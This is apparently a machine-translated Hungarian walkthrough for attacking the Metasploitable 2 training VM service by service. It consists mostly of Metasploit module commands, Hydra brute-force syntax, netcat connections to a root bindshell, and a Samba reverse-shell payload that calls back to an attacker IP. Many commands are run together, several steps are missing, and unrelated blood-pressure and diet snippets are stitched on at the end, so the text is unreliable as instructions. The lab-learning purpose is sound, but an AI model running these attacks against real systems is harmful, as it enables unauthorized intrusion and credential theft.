A felhasználói fiókba történő bejelentkezés után a Privilege escalation elvégzésével root hozzáférést kaphat.
3. módszer :
FTP kihasználása a Metasploit keretrendszeren keresztül
nyissa meg a Metasploit keretrendszer konzolját, és keressen rá a vsftpd Backdoor exploitra
msfconsole Search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Gratulálunk, hogy root hozzáférést kapott
22-SSH
A Secure Shell (SSH) egy kriptográfiai hálózati protokoll a hálózati szolgáltatások biztonságos működtetésére nem biztonságos hálózaton keresztül.
A SSH kihasználása különböző technikákkal
1. módszer
Felhasználónév és jelszó feltörése a Hydra segítségével
A Hydra egy beépített eszköz a Kali-Linuxban, amelyet a Brute force támadás egy olyan próbálkozási módszer, amelyet az alkalmazási programok használnak titkosított adatok, például jelszavak vagy Data Encryption Standard (DES) kulcsok dekódolására, kimerítő erőfeszítéssel (brute force használatával), nem pedig intellektuális stratégiák alkalmazásával.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Módszer 2
Megnyitja a Metasploit keretrendszert
Megnyitja a terminált és beírja ezeket a parancsokat :
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
beállítja ezt a segédprogramot és megnézi, mit igényel.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Beállítja az előre meghatározott felhasználónevek listáját és jelszavak listáját
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
Az időalapú felhasználónevek és jelszavak listáját veszi és Értesít a felhasználónév: jelszóval és bejelentkezik ezekkel a hitelesítő adatokkal.
ssh username@targetipaddress
A felhasználói hozzáféréssel rendelkezik, nem tudja elvégezni az összes feladatot, ezért megpróbál root hozzáférést szerezni a Privilege escalation elvégzésével.
23-TELNET
A Telnet egy egyszerű, szöveges alapú hálózati protokoll, amelyet távoli számítógépek elérésére használnak TCP/IP hálózatokon, például az interneten keresztül. A Telnetet 1969-ben hozták létre és indították el, és történelmileg azt mondhatjuk, hogy ez volt az első internet.
telnet <target IP Address> --> 192.168.0.130
Egyértelmezés szerint Grab Metasploitable 2 banner, azt mutatja, hogy Login with msfadmin/msfadmin to get a start. Csak adja meg ezeket a hitelesítő adatokat, és már bent is van.
25-SMTP
Az SMTP a TCP/IP protokoll alkalmazási rétegének része. Az SMTP a “tárolás és továbbítás” nevű folyamat segítségével mozgatja az e-maileket a hálózatokon és azokon keresztül. Szorosan együttműködik a Mail Transfer Agent (MTA) nevű eszközzel, hogy a kommunikációt a megfelelő számítógépre és e-mail postafiókba küldje.
1. módszer:
A Metasploit használatával
A Metasploit indítása a következő parancsok végrehajtásával
service postgresql startmsfconsole -qsearch smtp_version
.
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
Az SMTP a Simple Mail Transport Protocol rövidítése és egy szerver-szerver-kiszolgáló protokoll, és helyi adatbázist vezet a felhasználókról, akiknek e-maileket kell küldenie és fogadnia.
Az SMTP egy sor paranccsal rendelkezik. A 25-ös porton keresztül a “netcat” segítségével csatlakozunk a célpontunkhoz, és megpróbáljuk megszerezni ezt az adatbázis e-maileket.
Nyissunk egy új terminált és írjuk be:
nc 192.168.0.130 25
Most a kapcsolat létrejött, ellenőrizhetjük az “SMTP” parancsokkal
Type: vrfy user
vrfy (Ez egy nem- http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Method 2
Using smtp_enum
This is can be done by Metasploit
search smtp_enum
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
Ez a módszer felsorolást használ az SMTP szolgáltatásban lévő felhasználók e listájának kiderítésére.
Később a NetCat segíthet abban, hogy fordított kapcsolatot létesítsünk ezzel a felhasználóval.
139&445 Netbios-SSN
A Samba egy nyílt forráskódú projekt, amelyet széles körben használnak Linux és Unix számítógépeken, hogy azok együtt tudjanak működni a Windows fájl- és nyomtatási szolgáltatásaival.
A Samba-t akár Active szerverként is használhatjuk a bejelentkezés, hitelesítés és hozzáférés-szabályozás kezelésére egy Windows hálózaton.
Keresés az exploitra
use exploit/multi/samba/usermap_script
Az exploit lehetőségeinek megtekintéséhez
show optionsSet RHOST192.168.0.130 (Target IP address)
A payload beállítása
Show payloadsSet payload cmd/unix/reverse
A payloadhoz szükséges argumentumok beállítása
.
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Az ellenőrzés, ha minden szükséges argumentum kitöltésre került
exploit
1099-Java-RMI
A távoli módszerhívás (RMI) egy olyan API, amely lehetővé teszi, hogy egy objektum meghívjon egy módszert egy másik címtartományban létező objektumon, amely lehet ugyanazon a gépen vagy egy távoli gépen.
A java-RMI-kiszolgáló kihasználása
Keresd meg az exploitot
search java_rmi_server
Válaszd ki az exploitot a rangja szerint. például a “kiváló” jobban működik, mint a “normál”.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Elérést kaptunk a célgéphez.
1524-BINDSHELL
A bind shell egyfajta shell, amelyben a célgép megnyit egy kommunikációs portot vagy egy listenert az áldozat gépén, és várja a bejövő kapcsolatot. A támadó ezután csatlakozik az áldozat gépének listeneréhez, ami aztán kód vagy parancs végrehajtásához vezet a szerveren.
Exploitation
Ez egy root shell, így a netcat szolgáltatáson keresztül tudunk csatlakozni.
nc <target ip address> 1524
Gratulálunk, Ön most már root felhasználó.
2121-ProFTPD
A port kihasználása előtt szükség van a bejelentkezési adatokra, így mivel tudjuk, hogy a módszer Brute-force technikával kapjuk meg, A ProFTPd-t telnettel érhetjük el, Itt használjuk a felhasználót: user.
telnet <Taget IP Address> <Port Number>USER <username> PASS <password>
Ez egy normál felhasználó, Próbáljuk meg a Privilege Escalationt a root irányítás megszerzéséhez.
3306-MYSQL
Módszer 1:
Keresd meg az exploitot
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
.
Néha előfordulhat, hogy üres jelszóval rendelkezik a MySQL. Így ezt közvetlenül kihasználhatjuk.
Megjegyzés: alapértelmezés szerint a BLANK_PASSWORDS-t hamisnak mutatja, állítsuk igazra.
set BLANK_PASSWORDS as true
Módszer:2
Ebben a módszerben a MySQL-t fogjuk kihasználni a parancs segítségével, megadva a root felhasználónevet és a célpont IP címét.
mysql -u root -h <target's IP>
3632-DISTCCD
A disztcc egy olyan eszköz, amely a forráskód fordítását gyorsítja fel számítógépes hálózaton keresztül történő elosztott számítás segítségével. Megfelelő konfigurációval
a distcc drámaian csökkentheti egy projekt fordítási idejét
A 3632-es port kihasználása a distcc használatával
.exec
Open msfconsole and search for distcc_exec
search distcc_execshow options
Set required arguments to exploit
set RHOSTS <target-ip>exploit
We got Shell Access…Próbáljuk meg a jogosultságok kiterjesztését a magasabb jogosultságokhoz
A PostgreSQL kihasználása a postgre_payload segítségével
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
Ez a módszer a Linux vagy Unix vagy Windows operációs rendszereken üzemeltetett VNC szoftverek kihasználására szolgál a hitelesítési sebezhetőséggel.
Próbáljon meg csatlakozni a vnc-hez ezzel a jelszóval
A Vnc Viewer megnyitása a terminálban &Írd be az IP-címet és csatlakozz
a bejelentkezési prompt felugrik. és kéri a hitelesítő adatok megadását
Majd adja meg a jelszót és kattintson az OK gombra.
Voilaaa…!!!! hozzáférése van…Tudom, hogy most mire gondol…Ne szórakozzon a dolgok körül..boldog tanulást.
6000-X11
Az X Window System (más néven X) a UNIX-alapú operációs rendszerekben elterjedt, bitképes megjelenítésre szolgáló ablakrendszer. Az X biztosítja a GUI-alapú környezet alapvető keretrendszerét.
A távoli X11-kiszolgáló bárhonnan fogad kapcsolatokat, ahonnan internetkapcsolathoz lehet jutni. Ez felel a grafikus kártyákhoz, a beviteli eszközökhöz és a megjelenítő képernyőhöz való hozzáférésért akár számítógépen, akár vezeték nélküli eszközön.
A 6000-es port kihasználása ssh használatával
ssh -X -l msfadmin 192.168.0.122
A fenti parancsban az ‘X’ az összes port továbbítását engedélyezi, a felhasználónév és a célpont IP címének megadásával megkapjuk a shell
6667 & 6697 UnrealIRCD
Az UnrealIRCd egy nyílt forráskódú IRC szerver, amely 1999 óta több ezer hálózatot szolgál ki. Linuxon, OS X-en és Windowson fut
Az UnrealIRCd egy rendkívül fejlett IRCd, amely nagy hangsúlyt fektet a modularitásra, a fejlett és jól konfigurálható konfigurációs fájlra. A legfontosabb funkciók közé tartozik az SSL
Az UnrealIRCd az egyik legnépszerűbb és legteljesebb funkcióval rendelkező IRC daemon, és a legtöbb IRC szerveren használják
Ezt a szervert úgy írják le, hogy talán a legtöbb biztonsági funkcióval rendelkezik az IRC szerverek közül.
És másodszor is root-ot kaptunk…Try to Exploit this…Happy learning
8180-TOMCAT
Apache Tomcat a Java Servlet, JavaServer Pages, Java Expression Language és WebSocket technológiák nyílt forráskódú implementációja. A Tomcat egy “tiszta Java” HTTP webkiszolgáló környezetet biztosít, amelyben Java kód futtatható.
Az Apache-Tomcat kihasználása
Ez két lépésben végezhető el:
Open msfconsole & search for tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Az exploit alapértelmezett felhasználóneveket & jelszólistákat rendel. Az exploithoz tartozó argumentumok beállítása után Type exploit (vagy) run
run
Veszi ugyanazt a felhasználónevet és jelszót és megadja a következő exploitnak.
Vérnyomás 102/50 – mit jelent?Vérnyomás 102/50 a vérnyomásdiagramonEgy másik értéket ellenőriz?Vérnyomás 102/50 a vérnyomás skálánMi? kell tudni a 102/50-es vérnyomásrólVérnyomás…
Mi az alacsony szénhidráttartalmú mediterrán diéta?Az alacsonyabb szénhidráttartalmú, magas zsírtartalmú mediterrán étrend előnyei.Milyennek tűnik az alacsony szénhidráttartalmú mediterrán étrend?Mit kell…